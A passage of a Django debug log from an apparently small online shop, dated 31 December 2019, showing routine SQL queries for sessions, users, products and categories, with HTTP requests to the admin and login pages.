"auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-31 19:34:00,891 utils 2749 140297254205184 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-31 19:34:00,892 utils 2749 140297254205184 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-31 19:34:00,899 utils 2749 140297254205184 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC; args=() DEBUG 2019-12-31 19:34:01,126 utils 2749 140297254205184 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T19:34:01.124013+00:00'::timestamptz WHERE "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 19, 34, 1, 124013, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') [31/Dec/2019 19:34:01] "GET /shop/product/ HTTP/1.0" 200 10007 [31/Dec/2019 19:34:01] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 [31/Dec/2019 19:34:01] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 DEBUG 2019-12-31 19:34:01,359 utils 2749 140297222735616 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T19:34:01.350251+00:00'::timestamptz AND "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'); args=(datetime.datetime(2019, 12, 31, 19, 34, 1, 350251, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') DEBUG 2019-12-31 19:34:01,361 utils 2749 140297222735616 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [31/Dec/2019 19:34:01] "GET /jsi18n/ HTTP/1.0" 200 3223 [31/Dec/2019 19:34:01] "GET /static/admin/css/widgets.css HTTP/1.0" 200 10340 [31/Dec/2019 19:34:01] "GET /static/admin/img/sorting-icons.svg HTTP/1.0" 200 1097 [31/Dec/2019 19:37:59] "HEAD / HTTP/1.0" 302 0 DEBUG 2019-12-31 19:38:12,945 utils 2749 140297222735616 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'zey4fmvfojv8165kd4pb9r4ub9uzml00' LIMIT 1; args=('zey4fmvfojv8165kd4pb9r4ub9uzml00',) DEBUG 2019-12-31 19:38:12,946 utils 2749 140297222735616 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('zey4fmvfojv8165kd4pb9r4ub9uzml00', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T19:38:12.945492+00:00'::timestamptz); args=('zey4fmvfojv8165kd4pb9r4ub9uzml00', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 19, 38, 12, 945492, tzinfo=)) [31/Dec/2019 19:38:12] "HEAD /login/?next=/ HTTP/1.0" 200 1786 [31/Dec/2019 19:38:43] "GET / HTTP/1.0" 302 0 [31/Dec/2019 19:43:45] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 19:45:47,494 utils 2749 140297222735616 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T19:45:47.484925+00:00'::timestamptz AND "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'); args=(datetime.datetime(2019, 12, 31, 19, 45, 47, 484925, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') DEBUG 2019-12-31 19:45:47,496 utils 2749 140297222735616 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-31 19:45:47,523 utils 2749 140297222735616 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T19:45:47.521361+00:00'::timestamptz WHERE "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 19, 45, 47, 521361, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') [31/Dec/2019 19:45:47] "GET /shop/ HTTP/1.0" 200 2790 DEBUG 2019-12-31 19:45:52,555 utils 2749 140297222735616 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T19:45:52.541596+00:00'::timestamptz AND "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'); args=(datetime.datetime(2019, 12, 31, 19, 45, 52, 541596, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') DEBUG 2019-12-31 19:45:52,558 utils 2749 140297222735616 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-31 19:45:52,588 utils 2749 140297222735616 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-31 19:45:52,602 utils 2749 140297222735616 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T19:45:52.600267+00:00'::timestamptz WHERE "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 19, 45, 52, 600267, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') [31/Dec/2019 19:45:52] "GET / HTTP/1.0" 200 8208 DEBUG 2019-12-31 19:46:03,781 utils 2749 140297222735616 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T19:46:03.772883+00:00'::timestamptz AND "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'); args=(datetime.datetime(2019, 12, 31, 19, 46, 3, 772883, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') DEBUG 2019-12-31 19:46:03,784 utils 2749 140297222735616 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-31 19:46:03,810 utils 2749 140297222735616 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T19:46:03.808945+00:00'::timestamptz WHERE "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 19, 46, 3, 808945, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') [31/Dec/2019 19:46:03] "GET /shop/ HTTP/1.0" 200 2790 [31/Dec/2019 19:48:48] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 19:48:56,826 utils 2749 140297222735616 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T19:48:56.817455+00:00'::timestamptz AND "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'); args=(datetime.datetime(2019, 12, 31, 19, 48, 56, 817455, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') DEBUG 2019-12-31 19:48:56,828 utils 2749 140297222735616 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-31 19:48:56,864 utils 2749 140297222735616 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-31 19:48:56,873 utils 2749 140297222735616 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T19:48:56.871475+00:00'::timestamptz WHERE "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 19, 48, 56, 871475, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') [31/Dec/2019 19:48:56] "GET / HTTP/1.0" 200 8208 [31/Dec/2019 19:55:57] "GET / HTTP/1.0" 302 0 [31/Dec/2019 19:57:22] "GET / HTTP/1.0" 302 0 [31/Dec/2019 20:05:03] "GET / HTTP/1.0" 302 0 [31/Dec/2019 20:10:05] "GET / HTTP/1.0" 302 0 [31/Dec/2019 20:13:40] "GET / HTTP/1.0" 302 0 [31/Dec/2019 20:13:40] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 20:13:42,562 utils 2749 140297222735616 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '3qxsfdvwkiitx0let1drrrcngruhox5a' LIMIT 1; args=('3qxsfdvwkiitx0let1drrrcngruhox5a',) DEBUG 2019-12-31 20:13:42,564 utils 2749 140297222735616 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('3qxsfdvwkiitx0let1drrrcngruhox5a', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T20:13:42.563138+00:00'::timestamptz); args=('3qxsfdvwkiitx0let1drrrcngruhox5a', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 20, 13, 42, 563138, tzinfo=)) DEBUG 2019-12-31 20:13:42,565 utils 2749 140297212245760 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'gu514zx82de47ih5szmm9w9mbqht7cxh' LIMIT 1; args=('gu514zx82de47ih5szmm9w9mbqht7cxh',) [31/Dec/2019 20:13:42] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-12-31 20:13:42,568 utils 2749 140297212245760 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('gu514zx82de47ih5szmm9w9mbqht7cxh', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T20:13:42.566371+00:00'::timestamptz); args=('gu514zx82de47ih5szmm9w9mbqht7cxh', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 20, 13, 42, 566371, tzinfo=)) [31/Dec/2019 20:13:42] "GET /login/?next=/ HTTP/1.0" 200 1786 [31/Dec/2019 20:15:08] "GET / HTTP/1.0" 302 0 [31/Dec/2019 20:20:43] "GET / HTTP/1.0" 302 0 [31/Dec/2019 20:28:28] "GET / HTTP/1.0" 302 0 [31/Dec/2019 20:29:35] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 20:30:35,928 utils 2749 140297212245760 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 20:30:35,939 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 20:30:35,946 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 20:30:35,950 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 20:30:35,956 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 20:30:35,960 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 20:30:35,964 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 20:30:35,968 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 20:30:35,972 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 20:30:35,979 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 20:30:35,984 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 20:30:35,988 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 20:30:35,992 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 20:30:35,997 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 20:30:36,004 utils 2749 140297212245760 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 20:30:36,009 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 20:30:36,013 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 20:30:36,017 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 20:30:36,021 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 20:30:36,029 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 20:30:36,033 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 20:30:36,037 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 20:30:36,041 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 20:30:36,045 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 20:30:36,050 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 